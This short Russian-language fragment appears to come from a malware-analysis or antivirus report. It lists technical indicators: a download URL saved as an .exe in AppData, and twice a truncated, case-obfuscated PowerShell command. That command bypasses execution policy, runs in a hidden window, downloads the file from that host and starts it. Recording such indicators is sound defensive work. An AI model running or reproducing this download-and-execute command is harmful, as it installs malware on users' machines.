Техническая информация
- http://gotrustun.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POweRsHeLL.eXe -ExEcUTIonpOLcy bYpAsS -NopRoFIlE -WINdOWsTyLe HDDeN (nEW-ObJect systEM.nEt.wEBcLENT).DOWNlOadfILe('http://gotrustun.top/search.php','%AppDaTA%.ExE');sTARt-PROC...
- '<SYSTEM32>\cmd.exe' /c "POweRsHeLL.eXe -ExEcUTIonpOLcy bYpAsS -NopRoFIlE -WINdOWsTyLe HDDeN (nEW-ObJect systEM.nEt.wEBcLENT).DOWNlOadfILe('http://gotrustun.top/search.php','%AppDaTA%.ExE');sTARt-PROC...' (со скрытым окном)